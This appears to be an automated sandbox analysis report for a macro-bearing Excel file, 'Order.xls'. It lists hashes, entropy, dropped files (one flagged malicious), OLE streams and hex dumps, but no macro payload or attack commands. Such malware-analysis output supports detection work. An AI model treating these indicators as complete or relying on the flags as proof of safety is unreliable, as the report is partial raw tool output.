                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):339968
                            Entropy (8bit):7.4678958601186665
                            Encrypted:false
                            SSDEEP:6144:rk3hbdlylKsgwyzcTbWhZFVE+WaxHAcJycxdI2rHJFZpLcriO5nzdbNih7FnOIbk:MJTxdI2z/A+OZzdbNih7FnRMO5zW
                            MD5:03D9147AC62FAB158561F52672F5A4A4
                            SHA1:630C82AFBA2F70ABFF72A98816C4818557E7E286
                            SHA-256:90A620D74A8337CE523805A761D76410E50FBD60F29F2CE0531208D4C3485C4C
                            SHA-512:E00ACDA44E429E9600F6470C6487924F34CEF1EBEF80E737E8A049748D9A69C5195E7CB82E94634C12EB9BF1B2DE2BFA8018253966085620F8510BCE58E8CC43
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jan 15 17:25:55 2025, Security: 1
                            Category:dropped
                            Size (bytes):890880
                            Entropy (8bit):7.640986607290305
                            Encrypted:false
                            SSDEEP:24576:Bpbl/Az1dbIXRMkaVtu3bVgbARM896VMt:bbpAMX+JVtu3bVJk2t
                            MD5:966B3CCB661E6C38A6720777E24E6FED
                            SHA1:21DBF6532B7D69077B14D01696B4AFCCA9EFE6E8
                            SHA-256:A38F6814B688E1120312A6035AEBE8A9C701AF0F301FA9C3414CA4C3AEB90AE6
                            SHA-512:554C019E6DF7F8834A932F3798B38BE1BEF0117056D5C699D3E626878AB777CF57D6B3D1CBD13A25D5FB7BEA6A78C6A210712A459C3B4C4D289DA3B97C148210
                            Malicious:false
                            Preview:......................>...............................................................................C...D...................s...............................................................................................................................................................................................................................................................................................................................................................................................................B...$....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jan 15 17:25:55 2025, Security: 1
                            Category:dropped
                            Size (bytes):890880
                            Entropy (8bit):7.640986607290305
                            Encrypted:false
                            SSDEEP:24576:Bpbl/Az1dbIXRMkaVtu3bVgbARM896VMt:bbpAMX+JVtu3bVJk2t
                            MD5:966B3CCB661E6C38A6720777E24E6FED
                            SHA1:21DBF6532B7D69077B14D01696B4AFCCA9EFE6E8
                            SHA-256:A38F6814B688E1120312A6035AEBE8A9C701AF0F301FA9C3414CA4C3AEB90AE6
                            SHA-512:554C019E6DF7F8834A932F3798B38BE1BEF0117056D5C699D3E626878AB777CF57D6B3D1CBD13A25D5FB7BEA6A78C6A210712A459C3B4C4D289DA3B97C148210
                            Malicious:true
                            Preview:......................>...............................................................................C...D...................s...............................................................................................................................................................................................................................................................................................................................................................................................................B...$....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jan 14 08:58:49 2025, Security: 1
                            Entropy (8bit):7.767606708883663
                            TrID:
                            • Microsoft Excel sheet (30009/1) 47.99%
                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                            File name:Order.xls
                            File size:1'275'904 bytes
                            MD5:439a22208699135960b30717b0aeedbc
                            SHA1:f0a626b392d2cf72659b567e8a75d8d862195669
                            SHA256:b04e78fa62cab8562fdcd884fa8813a4e802c8f78bfa8c1d25db2a8684868dd0
                            SHA512:447c286a44badf6a2e237ac0d37a37ecc22eac793e59c03e66d619e16f01afb06c336198f5c7a25eb6a5154f529e3fedfc886d6e3ba8ba0c8db12cb86b276273
                            SSDEEP:24576:RkefLKzXea3tjAb1ZbcPBsTYil3bVUbARM8UkyaM8KrI0YfI/25SW0U:OefLKT53lgkP28il3bVFY/adKrvYf029
                            TLSH:3645F1C3A24D9F52C91543347AB34B5E1711AD03E952A2BB22F4731E2BF72D04A93F5A
                            File Content Preview:........................>.......................................................................................................m.......o.......q.......s......................................................................................................
                            Icon Hash:35ed8e920e8c81b5
                            Document Type:OLE
                            Number of OLE Files:1
                            Has Summary Info:
                            Application Name:Microsoft Excel
                            Encrypted Document:True
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:True
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:False
                            Flash Objects Count:0
                            Contains VBA Macros:True
                            Code Page:1252
                            Author:
                            Last Saved By:
                            Create Time:2006-09-16 00:00:00
                            Last Saved Time:2025-01-14 08:58:49
                            Creating Application:Microsoft Excel
                            Security:1
                            Document Code Page:1252
                            Thumbnail Scaling Desired:False
                            Contains Dirty Links:False
                            Shared Document:False
                            Changed Hyperlinks:False
                            Application Version:786432
                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                            VBA File Name:Sheet1.cls
                            Stream Size:977
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B I H . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 42 49 c6 48 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Attribute VB_Name = "Sheet1"
                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            

                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                            VBA File Name:Sheet2.cls
                            Stream Size:977
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B I . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 42 49 ba da 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Attribute VB_Name = "Sheet2"
                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            

                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                            VBA File Name:Sheet3.cls
                            Stream Size:977
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B I L ` . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 42 49 4c 60 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Attribute VB_Name = "Sheet3"
                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            

                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                            VBA File Name:ThisWorkbook.cls
                            Stream Size:985
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B I M . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 42 49 4d a8 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Attribute VB_Name = "ThisWorkbook"
                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            

                            General
                            Stream Path:\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.25248375192737
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:244
                            Entropy:2.889430592781307
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                            General
                            Stream Path:\x5SummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:200
                            Entropy:3.292068105701867
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . b f . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                            General
                            Stream Path:MBD0047BAA9/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:99
                            Entropy:3.631242196770981
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD0047BAA9/Package
                            CLSID:
                            File Type:Microsoft Excel 2007+
                            Stream Size:94938
                            Entropy:7.802085992566851
                            Base64 Encoded:True
                            Data ASCII:P K . . . . . . . . . . ! . . M v j . . . 8 . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 19 4d 76 6a ba 01 00 00 38 07 00 00 13 00 d9 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d5 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD0047BAAA/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.25248375192737
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD0047BAAA/\x5DocumentSummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:244
                            Entropy:2.701136490257069
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                            General
                            Stream Path:MBD0047BAAA/\x5SummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:220
                            Entropy:3.3813251513223976
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . ^ . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                            General
                            Stream Path:MBD0047BAAA/MBD000673C0/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.219515110876372
                            Base64 Encoded:False
                            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD0047BAAA/MBD000673C0/Package
                            CLSID:
                            File Type:Microsoft Excel 2007+
                            Stream Size:17987
                            Entropy:7.459551056433264
                            Base64 Encoded:True
                            Data ASCII:P K . . . . . . . . . . ! . . 4 v . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c8 a3 cd 34 76 01 00 00 04 05 00 00 13 00 dd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD0047BAAA/MBD00083EA7/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.219515110876372
                            Base64 Encoded:False
                            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD0047BAAA/MBD00083EA7/Package
                            CLSID:
                            File Type:Microsoft Excel 2007+
                            Stream Size:14238
                            Entropy:7.30552548787177
                            Base64 Encoded:True
                            Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD0047BAAA/MBD000846C9/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.25248375192737
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD0047BAAA/MBD000846C9/\x5DocumentSummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:708
                            Entropy:3.6235698530352805
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00
                            General
                            Stream Path:MBD0047BAAA/MBD000846C9/\x5SummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:372
                            Entropy:2.913345911478729
                            Base64 Encoded:True
